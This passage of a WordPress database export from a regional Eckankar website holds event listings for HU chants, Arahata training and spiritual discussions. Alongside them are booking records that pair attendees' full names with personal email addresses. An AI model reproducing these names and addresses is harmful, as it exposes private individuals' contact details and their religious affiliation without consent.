body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span><br>\r\n<span style=\"font-size: 14pt;\">Divine love</span><br>\r\n<span style=\"font-size: 14pt;\">Expanded awareness</span><br>\r\n<span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span><br>\r\n<span style=\"font-size: 14pt;\">Healing of the heart</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - Online','','publish','closed','closed','','experience-hu-the-sound-of-soul-online-3','','','2022-12-17 11:32:26','2022-12-17 18:32:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267579',0,'mec-events','',0),(267580,0,'2022-12-17 12:36:53','2022-12-17 19:36:53','','','','publish','closed','closed','','267580','','','2022-12-17 12:36:53','2022-12-17 19:36:53','',0,'https://eckankar-colorado.org/nf_sub/267580/',0,'nf_sub','',0),(267581,0,'2022-12-17 16:10:05','2022-12-17 23:10:05','','','','publish','closed','closed','','267581','','','2022-12-17 16:10:05','2022-12-17 23:10:05','',0,'https://eckankar-colorado.org/nf_sub/267581/',0,'nf_sub','',0),(267582,1000057,'2022-12-18 10:30:00','2022-12-18 17:30:00','','Paul Hanson - azpaulfh@aol.com','','publish','closed','closed','','paul-hanson-azpaulfhaol-com','','','2022-12-18 10:30:00','2022-12-18 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267582',0,'mec-books','',0),(267583,1000058,'2022-12-18 11:45:00','2022-12-18 18:45:00','','Elijah Beard - einwrm@gmail.com','','publish','closed','closed','','elijah-beard-einwrmgmail-com','','','2022-12-18 11:45:00','2022-12-18 18:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267583',0,'mec-books','',0),(267584,1000059,'2023-01-08 10:30:00','2023-01-08 17:30:00','','Brown Ugbaja - nkemjikaugbaja@aol.com','','publish','closed','closed','','brown-ugbaja-nkemjikaugbajaaol-com','','','2023-01-08 10:30:00','2023-01-08 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267584',0,'mec-books','',0),(267585,1000060,'2023-01-08 10:30:00','2023-01-08 17:30:00','','Gai Lawson - gai.lawson@icloud.com','','publish','closed','closed','','gai-lawson-gai-lawsonicloud-com','','','2023-01-08 10:30:00','2023-01-08 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267585',0,'mec-books','',0),(267586,0,'2022-12-18 09:27:33','2022-12-18 16:27:33','','','','publish','closed','closed','','267586','','','2022-12-18 09:27:33','2022-12-18 16:27:33','',0,'https://eckankar-colorado.org/nf_sub/267586/',0,'nf_sub','',0),(267587,1000015,'2022-12-18 11:45:00','2022-12-18 18:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-13','','','2022-12-18 11:45:00','2022-12-18 18:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267587',0,'mec-books','',0),(267588,1000014,'2022-12-18 11:45:00','2022-12-18 18:45:00','','kery colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-5','','','2022-12-18 11:45:00','2022-12-18 18:45:00','',0,'https://eckankar-colorado.org/mec-books/kery-colvin-keanchicoyahoo-com-5/',0,'mec-books','',0),(267589,1000061,'2022-12-18 11:45:00','2022-12-18 18:45:00','','Chukwuebuka - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-ocekenediliyahoo-com','','','2022-12-18 11:45:00','2022-12-18 18:45:00','',0,'https://eckankar-colorado.org/mec-books/chukwuebuka-ocekenediliyahoo-com/',0,'mec-books','',0),(267611,1000039,'2023-01-08 10:30:00','2023-01-08 17:30:00','','Nancy - n.condon@yahoo.com','','publish','closed','closed','','nancy-n-condonyahoo-com-2','','','2023-01-08 10:30:00','2023-01-08 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267611',0,'mec-books','',0),(267594,0,'2022-12-27 13:48:55','2022-12-27 20:48:55','','','','publish','closed','closed','','267594','','','2022-12-27 13:48:55','2022-12-27 20:48:55','',0,'https://eckankar-colorado.org/nf_sub/267594/',0,'nf_sub','',0),(267595,0,'2022-12-29 18:30:32','2022-12-30 01:30:32','','','','publish','closed','closed','','267595','','','2022-12-29 18:30:32','2022-12-30 01:30:32','',0,'https://eckankar-colorado.org/nf_sub/267595/',0,'nf_sub','',0),(267598,2,'2022-12-30 12:26:41','2022-12-30 19:26:41','','sky-clouds-1','','inherit','closed','closed','','sky-clouds-1','','','2022-12-30 12:26:41','2022-12-30 19:26:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/12/sky-clouds-1.jpg',0,'attachment','image/jpeg',0),(267600,0,'2022-12-30 19:18:12','2022-12-31 02:18:12','','','','publish','closed','closed','','267600','','','2022-12-30 19:18:12','2022-12-31 02:18:12','',0,'https://eckankar-colorado.org/nf_sub/267600/',0,'nf_sub','',0),(267601,1000062,'2023-01-01 10:30:00','2023-01-01 17:30:00','','Lexi - alexareevesmassey@gmail.com','','publish','closed','closed','','lexi-alexareevesmasseygmail-com','','','2023-01-01 10:30:00','2023-01-01 17:30:00','',0,'https://eckankar-colorado.org/mec-books/lexi-alexareevesmasseygmail-com/',0,'mec-books','',0),(267602,0,'2023-01-01 13:38:08','2023-01-01 20:38:08','','','','publish','closed','closed','','267602','','','2023-01-01 13:38:08','2023-01-01 20:38:08','',0,'https://eckankar-colorado.org/nf_sub/267602/',0,'nf_sub','',0),(267603,0,'2023-01-01 14:25:32','2023-01-01 21:25:32','','','','publish','closed','closed','','267603','','','2023-01-01 14:25:32','2023-01-01 21:25:32','',0,'https://eckankar-colorado.org/nf_sub/267603/',0,'nf_sub','',0),(267604,0,'2023-01-01 18:59:33','2023-01-02 01:59:33','','','','publish','closed','closed','','267604','','','2023-01-01 18:59:33','2023-01-02 01:59:33','',0,'https://eckankar-colorado.org/nf_sub/267604/',0,'nf_sub','',0),(267605,0,'2023-01-02 08:58:31','2023-01-02 15:58:31','','','','publish','closed','closed','','267605','','','2023-01-02 08:58:31','2023-01-02 15:58:31','',0,'https://eckankar-colorado.org/nf_sub/267605/',0,'nf_sub','',0),(267606,0,'2023-01-02 16:17:14','2023-01-02 23:17:14','','','','publish','closed','closed','','267606','','','2023-01-02 16:17:14','2023-01-02 23:17:14','',0,'https://eckankar-colorado.org/nf_sub/267606/',0,'nf_sub','',0),(267609,2,'2023-01-07 10:56:20','2023-01-07 17:56:20','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #c47327;\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Roundtables are facilitated by an ECK Spiritual Aide, a cleric and longtime member of Eckankar who is specially trained to lead these forums.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Spiritual Guidance and Dreams\'<br>Roundtable Discussion - In Person','','publish','closed','closed','','spiritual-guidance-and-dreamsroundtable-discussion-in-person','','','2023-01-07 10:58:03','2023-01-07 17:58:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267609',0,'mec-events','',0),(267736,0,'2023-01-15 22:52:48','2023-01-16 05:52:48','','','','publish','closed','closed','','267736','','','2023-01-15 22:52:48','2023-01-16 05:52:48','',0,'https://eckankar-colorado.org/nf_sub/267736/',0,'nf_sub','',0),(267613,2,'2023-01-07 20:54:53','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This event is for chelas who have completed \'Arahata Training\' --</span></strong><br>\n</span></div>\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\n<div>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Are you a Second Initiate or above and would like to take Arahata training?</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">When you take Arahata training you can become a teacher of the message of ECK to those who want to know more about ECKANKAR.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Opportunities to serve as an Arahata abound, such as leading an ECK Satsang class, book discussion, or Meetup event, or simply discussing the ECK teachings with friends, family, and casual acquaintances.</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\"><em>Online via Zoom</em></span></strong></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Orientation Meeting</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Tuesday, February 21</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">7:00 - 8:00 p.m. </span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong><br>\n</strong>Arahata Training Classes </span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Friday evenings, 6:30 - 8:30 p.m.</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">February 24 •&nbsp;March 10 •&nbsp;March 24</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">March 31 •&nbsp;April 14 • April 28</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">The required book for this training is the newly revised <em><strong>ECK Arahata Book</strong>, </em>third edition. You may order it online at: <a href=\"https://clt550457.benchmarkurl.com/c/l?u=EAAB4A2&amp;e=1558497&amp;c=86639&amp;t=0&amp;l=2E2F6967&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=3\" target=\"_blank\" rel=\"noopener\">ECKBooks.org</a>.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Be sure to click on \"Eckankar Member Login.\" Go to \"Items for Members,\"&nbsp; <em>ECK Arahata Book</em>, Item #: 011530, $6.00 plus shipping. Shipping can take 3-4 weeks, so please order now. Or call Membership Services to order: (952) 380-2222 (weekdays, 8:00 a.m. to 5:00 p.m., central time).</span></p>\n</div>\n<div></div>\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\n</div>\n</div>\n</div>\n</div>','Arahata Training for Colorado and Utah - Online ---TEMPLATE --ONLY FOR MEMBER CALENDARS','','draft','closed','closed','','','','','2023-01-07 20:54:53','2023-01-08 03:54:53','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267613',0,'mec-events','',0),(267614,1000022,'2023-01-08 10:30:00','2023-01-08 17:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-8','','','2023-01-08 10:30:00','2023-01-08 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267614',0,'mec-books','',0),(267616,1000063,'2023-01-08 10:30:00','2023-01-08 17:30:00','','BJ Wagner - bjinlohi@gmail.com','','publish','closed','closed','','bj-wagner-bjinlohigmail-com','','','2023-01-08 10:30:00','2023-01-08 17:30:00','',0,'https://eckankar-colorado.org/mec-books/bj-wagner-bjinlohigmail-com/',0,'mec-books','',0),(267617,2,'2023-01-08 12:31:10','2023-01-08 19:31:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This Event is for Eckankar Members --</span></strong><br>\r\n</span></div>\r\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\r\n<div>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Are you a Second Initiate or above and would like to take Arahata training?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">When you take Arahata training you can become a teacher of the message of ECK to those who want to know more about ECKANKAR.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Opportunities to serve as an Arahata abound, such as leading an ECK Satsang class, book discussion, or Meetup event, or simply discussing the ECK teachings with friends, family, and casual acquaintances.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Orientation Meeting <em>- Online via Zoom</em></span></strong></p>\r\n<p class=\"\" style=\"padding-left: 40px; border-width: 0px; padding-top: 0em; margin-top: -5px;\"><span style=\"font-size: 14pt;\">Tuesday, February 21<br>\r\n</span><span style=\"font-size: 14pt;\">7:00 - 8:00 p.m. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Arahata Training Class Dates and Times</strong> </span></p>\r\n<p class=\"\" style=\"padding-left: 40px; border-width: 0px; margin-top: -5px;\"><span style=\"font-size: 14pt;\">Friday evenings, 6:30 - 8:30 p.m.<br>\r\n</span><span style=\"font-size: 14pt;\">February 24 •&nbsp;March 10 •&nbsp;March 24<br>\r\n</span><span style=\"font-size: 14pt;\">March 31 •&nbsp;April 14 • April 28</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The required book for this training is the newly revised <em><strong>ECK Arahata Book</strong>, </em>third edition. You may order it online at: <a href=\"https://clt550457.benchmarkurl.com/c/l?u=EAAB4A2&amp;e=1558497&amp;c=86639&amp;t=0&amp;l=2E2F6967&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=3\" target=\"_blank\" rel=\"noopener\">ECKBooks.org</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Be sure to click on \"Eckankar Member Login.\" Go to \"Items for Members,\"&nbsp; <em>ECK Arahata Book</em>, Item #: 011530, $6.00 plus shipping. Shipping can take 3-4 weeks, so please order now. Or call Membership Services to order: (952) 380-2222 (weekdays, 8:00 a.m. to 5:00 p.m., central time).</span></p>\r\n</div>\r\n<div></div>\r\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Arahata Training for Colorado and Utah\'<br>Online Orientation Meeting','','publish','closed','closed','','arahata-training-for-colorado-and-utah-online-orientation-meeting','','','2023-01-08 12:46:59','2023-01-08 19:46:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267617',0,'mec-events','',0),(267619,2,'2023-01-08 12:53:11','2023-01-08 19:53:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This Event is for Eckankar Members --</span></strong><br>\r\n</span></div>\r\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\r\n<div>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Are you a Second Initiate or above and would like to take Arahata training?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">When you take Arahata training you can become a teacher of the message of ECK to those who want to know more about ECKANKAR.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Opportunities to serve as an Arahata abound, such as leading an ECK Satsang class, book discussion, or Meetup event, or simply discussing the ECK teachings with friends, family, and casual acquaintances.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Arahata Training Class Dates and Times</strong> </span></p>\r\n<p class=\"\" style=\"padding-left: 40px; border-width: 0px; margin-top: -10px;\"><span style=\"font-size: 14pt;\">Friday evenings, 6:30 - 8:30 p.m.<br>\r\n</span><span style=\"font-size: 14pt;\">February 24 •&nbsp;March 10 •&nbsp;March 24<br>\r\n</span><span style=\"font-size: 14pt;\">March 31 •&nbsp;April 14 • April 28</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The required book for this training is the newly revised <em><strong>ECK Arahata Book</strong>, </em>third edition. You may order it online at: <a href=\"https://clt550457.benchmarkurl.com/c/l?u=EAAB4A2&amp;e=1558497&amp;c=86639&amp;t=0&amp;l=2E2F6967&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=3\" target=\"_blank\" rel=\"noopener\">ECKBooks.org</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Be sure to click on \"Eckankar Member Login.\" Go to \"Items for Members,\"&nbsp; <em>ECK Arahata Book</em>, Item #: 011530, $6.00 plus shipping. Shipping can take 3-4 weeks, so please order now. Or call Membership Services to order: (952) 380-2222 (weekdays, 8:00 a.m. to 5:00 p.m., central time).</span></p>\r\n</div>\r\n<div></div>\r\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Arahata Training for Colorado and Utah\'<br>Online Class','','publish','closed','closed','','arahata-training-for-colorado-and-utahonline-class','','','2023-01-08 12:54:46','2023-01-08 19:54:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267619',0,'mec-events','',0),(267620,2,'2023-01-08 21:52:57','2023-01-09 04:52:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Discover how to do and be your very best in service as you work towards ECK Mastership. Spiritual Duties of the ECK Volunteer training is open to all ECK members in good standing and is required for those who wish to become Arahatas. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Sunday, January 29<br>\r\n</strong></span><span style=\"font-size: 14pt;\"><strong>10:30 a.m. - 12:00 p.m.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">To prepare, read and contemplate the material in the <em>Spiritual Duties of ECK Volunteer</em> (2022).</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">To download guidelines in PDF format: <a href=\"https://clt550457.benchmarkurl.com/c/l?u=EBF9995&amp;e=1558497&amp;c=86639&amp;t=0&amp;l=2E2F6967&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=1\" target=\"_blank\" rel=\"noopener\">Guidelines</a>&nbsp;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">For printed copy from the ECKANKAR Bookstore:&nbsp; <a href=\"https://clt550457.benchmarkurl.com/c/l?u=EAAB4A2&amp;e=1558497&amp;c=86639&amp;t=0&amp;l=2E2F6967&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=2\" target=\"_blank\" rel=\"noopener\">ECKBooks.org</a></span></li>\r\n</ul>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span><span class=\"\" style=\"font-size: 14pt;\">There will be small group discussions and slides, so attendance by computer or mobile device is recommended, but you can attend by phone.</span></div>\r\n<div>\r\n<div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n</div>\r\n</div>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We look forward to seeing you in class!</span></p>\r\n<p class=\"\"><span class=\"\" style=\"color: #1d5791; font-size: 18pt;\"><strong>See the current \'Colorado Chela Newsletter\' for login information.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Duties of the ECK Volunteer --- TEMPLATE','','draft','closed','closed','','spiritual-duties-of-the-eck-volunteertraining-via-zoom','','','2023-07-29 11:43:25','2023-07-29 17:43:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267620',0,'mec-events','',0),(267623,0,'2023-01-10 10:19:11','2023-01-10 17:19:11','','','','publish','closed','closed','','267623','','','2023-01-10 10:19:11','2023-01-10 17:19:11','',0,'https://eckankar-colorado.org/nf_sub/267623/',0,'nf_sub','',0),(267624,2,'2023-01-11 11:19:25','2023-01-11 18:19:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<ul class=\"\">\r\n	<li class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><span class=\"\" style=\"font-size: 16pt;\">Make your life better with an understanding of karma</span></li>\r\n	<li class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><span style=\"font-size: 16pt;\">You\'ve lived before, and you will live again</span></li>\r\n	<li class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><span class=\"\" style=\"font-size: 16pt;\">Dreams prepare us for the future</span><br>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #1d5791; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The choices you\'ve made in the past are the direct cause of all your unhappiness today.\"<br>\r\nIf you don\'t \"absolutely reject the above explanation for your unhappiness . . . perhaps, you\'ll begin to see how and why individuals make bad choices. Most important, you may learn how to stop making them.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em>ECK Wisdom on Karma and Reincarnation</em></span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You\'ll learn how to break free from the wheel of reincarnation and step into a more spiritually rewarding life today.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this open discussion, which is the second of three that dig deeper into the topic each time. Join us for one or all lively discussions about Karma and Reincarnation\'.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*** </span><span style=\"font-size: 14pt;\">\'<a href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Karma_and_Reincarnation-1097-0.html\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Karma and Reincarnation</a>\', is a free booklet we make available to you; it contains the secret to true happiness. (small booklet, 74 pages)</span><br>\r\n<br>\r\n</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/290841243/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','\'Karma and Reincarnation\'<br>Online Spiritual Discussion','','publish','closed','closed','','karma-and-reincarnationmeetuponline-spiritual-discussion','','','2023-01-11 11:28:06','2023-01-11 18:28:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267624',0,'mec-events','',0),(267626,2,'2023-02-03 11:14:09','2023-02-03 18:14:09','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 16px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px;\">\r\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 29px; color: #1e63bc;\" data-font-style=\"\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Are you looking for a deeper, more personal connection with God and Divine Spirit?<br>\r\nEckankar, the Path of Spiritual Freedom, can help you fulfill that dream.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The events below can help you see beyond the surface of day-to-day life so you can <br>\r\nexperience the joy of Soul—your true self. Each awakens you to more of the love, wisdom, and creative powers already in your heart.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Discover your life as a spiritual adventure!</p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>','New ECK Model - WELCOME ELEMENT - 1/11/2023','','publish','closed','closed','','new-eck-model-welcome-element-1-11-2023','','','2023-02-03 11:14:09','2023-02-03 18:14:09','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267626',0,'bg_block','',0),(267639,2,'2023-01-12 13:19:24','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 14px; padding-bottom: 31px; border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/01/soul-adv-banner-bk-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/soul-adv-banner-bk-1.jpg\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"bg-font-family-alt\" style=\"text-align: center; border-width: 0px; font-size: 29px; color: rgba(61, 61, 61, 0.88); line-height: 52px; padding-top: 0em; margin-top: 24px;\">ECK SOUL ADVENTURE EVENTS</p>\n</div>\n</div>\n</div>\n</div>','New ECK Model - Soul Adventure Events Banner Element -1/11/2023','','draft','closed','closed','','','','','2023-01-12 13:19:24','2023-01-12 20:19:24','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267639',0,'bg_block','',0),(267739,1000015,'2023-01-22 11:45:00','2023-01-22 18:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-14','','','2023-01-22 11:45:00','2023-01-22 18:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267739',0,'mec-books','',0),(267647,2,'2023-02-03 13:57:43','2023-02-03 20:57:43','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 25px; color: #595959;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 50px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; color: #595959;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" 